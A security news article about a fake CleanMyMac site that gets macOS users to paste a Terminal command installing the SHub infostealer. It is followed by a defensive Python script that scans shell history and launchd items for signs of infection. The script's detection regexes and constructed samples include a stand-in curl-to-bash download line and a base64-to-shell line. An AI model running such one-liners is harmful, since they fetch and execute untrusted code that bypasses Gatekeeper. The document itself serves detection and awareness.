Mac Malware Tricks Users With Fake CleanMyMac
10 Mar
Summary
- A fake website impersonating the official CleanMyMac site lures users into downloading a bogus copy of the utility.
- Instead of a normal installer, users are told to paste a command into Terminal, which installs the malware without a Gatekeeper check.
- The SHub infostealer harvests credentials, Keychain data and cryptocurrency wallets, then installs a backdoor for persistence and remote command execution.

A malicious campaign is deceiving macOS users with a fake utility that mimics the legitimate CleanMyMac software. Researchers have identified a fake website designed to look identical to the official CleanMyMac site, which tricks visitors into downloading a malicious program.
Instead of a straightforward installation, victims are prompted to open Terminal and paste a command. This sidesteps macOS protections such as Gatekeeper: Gatekeeper only evaluates files that carry the quarantine attribute a browser attaches to downloads, and a script fetched and run from a pasted command never receives that attribute, so no warning appears. The command installs the SHub infostealer, which then asks for the user's macOS password. With that password it can read sensitive data including the Keychain and saved Wi-Fi credentials.
The malware systematically steals passwords, private keys, cryptocurrency wallets and iCloud data. It then installs a backdoor and replaces installed cryptocurrency apps with malicious versions, both to stay on the machine and to enable further theft. The attackers also maintain persistence through a component disguised as a Google update service, which lets them execute commands on infected Macs remotely.
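The two host artefacts described above (a pasted download-and-execute one-liner in the shell history, and a launch item that borrows a Google updater name but runs something else) can be checked for offline. The following triage script is an added example, not code from the article or from the researchers who analysed SHub. It assumes the fake update service is registered as a launchd plist (the article does not say which mechanism is used), it assumes legitimate Google updater binaries live under /Library/Google or ~/Library/Google, and its sample history lines and plists are constructed stand-ins, not the campaign's actual command.

```python
"""Offline triage for a paste-to-Terminal macOS infection (added example).
Uses only the standard library so it runs against copied files as well as a
live Mac.  All patterns and sample data are constructed; they are NOT SHub's
real command or file names, which the article does not reproduce."""
import re
import plistlib
from pathlib import Path

# --- 1. the pasted one-liner -------------------------------------------------
HIST_PREFIX = re.compile(r"^:\s*\d+:\d+;")          # zsh extended-history stamp
INTERPRETER = r"(?:sudo\s+)?(?:(?:ba|z|)sh|python3?|osascript)\b"
PIPE_TO_SHELL = re.compile(rf"\b(?:curl|wget)\b[^|;&]*\|\s*{INTERPRETER}")
DECODE_TO_SHELL = re.compile(rf"\bbase64\s+(?:-D|-d|--decode)\b[^|]*\|\s*{INTERPRETER}")
STRIP_QUARANTINE = re.compile(r"\bxattr\s+-[A-Za-z]*d\S*\s+com\.apple\.quarantine")

def flag_history_lines(lines):
    """Return (line_no, reason, command) for history lines that look like a
    download-and-run install.  Such a command never gets the quarantine
    attribute, so Gatekeeper never sees what it fetched."""
    hits = []
    for n, raw in enumerate(lines, 1):
        cmd = HIST_PREFIX.sub("", raw).strip()
        if PIPE_TO_SHELL.search(cmd):
            hits.append((n, "remote script piped to interpreter", cmd))
        elif DECODE_TO_SHELL.search(cmd):
            hits.append((n, "base64 payload decoded into a shell", cmd))
        elif STRIP_QUARANTINE.search(cmd):
            hits.append((n, "quarantine attribute stripped by hand", cmd))
    return hits

# --- 2. a launch item impersonating Google's updater -------------------------
LAUNCH_DIRS = ("/Library/LaunchAgents", "/Library/LaunchDaemons", "~/Library/LaunchAgents")
GOOGLE_LABEL = re.compile(r"google|keystone", re.IGNORECASE)
# Assumption: Google's own updater is installed under these prefixes.
LEGIT_GOOGLE = re.compile(r"^(?:~|/Users/[^/]+)?/Library/(?:Application Support/)?Google/")

def program_of(plist):
    """The executable launchd will run: Program, else ProgramArguments[0]."""
    prog = plist.get("Program")
    if not prog:
        args = plist.get("ProgramArguments") or []
        prog = args[0] if args else ""
    return str(prog)

def flag_launch_items(plist_blobs):
    """plist_blobs: {path: bytes}.  Return (path, label, program, reason) for
    items whose label or file name looks like Google's updater but whose
    program lives outside Google's install directories."""
    hits = []
    for path, blob in plist_blobs.items():
        try:
            pl = plistlib.loads(blob)
        except Exception:
            hits.append((path, "", "", "unparseable plist"))
            continue
        label = str(pl.get("Label", ""))
        prog = program_of(pl)
        looks_google = GOOGLE_LABEL.search(label) or GOOGLE_LABEL.search(Path(path).name)
        if looks_google and not LEGIT_GOOGLE.match(prog):
            hits.append((path, label, prog, "Google-style label, program outside Google dirs"))
    return hits

def load_launch_items(dirs=LAUNCH_DIRS):
    blobs = {}
    for d in dirs:
        for p in Path(d).expanduser().glob("*.plist"):
            try:
                blobs[str(p)] = p.read_bytes()
            except OSError:
                pass
    return blobs

# --- constructed sample data (not real campaign artefacts) -------------------
SAMPLE_HISTORY = [
    ": 1710000000:0;ls -la",
    ": 1710000100:0;curl -fsSL https://cleanmymac-lookalike.invalid/install.sh | bash",
    "echo aGVsbG8= | base64 -d | sh",
    "brew update",
]
_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>%s</string>
<key>ProgramArguments</key><array><string>%s</string></array>
<key>RunAtLoad</key><true/>
</dict></plist>"""
SAMPLE_PLISTS = {
    "/Users/alice/Library/LaunchAgents/com.google.keystone.agent.plist":
        _PLIST % (b"com.google.keystone.agent", b"/Users/Shared/.update/agent"),
    "/Library/LaunchAgents/com.google.keystone.agent.plist":
        _PLIST % (b"com.google.keystone.agent",
                  b"/Library/Google/GoogleSoftwareUpdate/GoogleSoftwareUpdate.bundle/Contents/MacOS/agent"),
    "/Users/alice/Library/LaunchAgents/homebrew.mxcl.redis.plist":
        _PLIST % (b"homebrew.mxcl.redis", b"/opt/homebrew/opt/redis/bin/redis-server"),
}

if __name__ == "__main__":
    hist = Path("~/.zsh_history").expanduser()
    lines = hist.read_text(errors="ignore").splitlines() if hist.exists() else SAMPLE_HISTORY
    for hit in flag_history_lines(lines):
        print("history:", hit)
    for hit in flag_launch_items(load_launch_items() or SAMPLE_PLISTS):
        print("launchd:", hit)
```

On a live Mac the script reads ~/.zsh_history and the three launchd directories; when those are absent it falls back to the constructed samples, flagging the curl-to-bash line, the base64-to-sh line and the keystone-labelled agent that runs from /Users/Shared. Two further checks worth running by hand, because they need macOS tooling: `codesign --verify --deep --strict /Applications/<wallet>.app` on every cryptocurrency app, since the article says the backdoor swaps them for malicious copies, and `xattr -p com.apple.quarantine <file>` on anything recently dropped into Applications, which should fail for a file that arrived via a pasted command rather than a browser download.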